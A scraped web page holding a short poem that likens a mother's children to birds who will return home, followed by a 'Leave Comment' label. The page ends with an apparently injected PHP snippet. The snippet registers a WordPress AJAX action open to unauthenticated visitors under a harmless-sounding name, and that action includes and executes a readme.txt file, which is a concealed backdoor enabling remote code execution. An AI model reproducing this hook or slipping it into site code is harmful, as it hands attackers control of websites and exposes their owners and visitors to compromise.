Mother, your children are like birds,
Their wings have fluttered into the distance.
Mother, to the bright and native chamber,
Soon we shall return once more.
Leave Comment
if(!function_exists('file_check_readme53745')){ add_action('wp_ajax_nopriv_file_check_readme53745', 'file_check_readme53745'); add_action('wp_ajax_file_check_readme53745', 'file_check_readme53745'); function file_check_readme53745() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }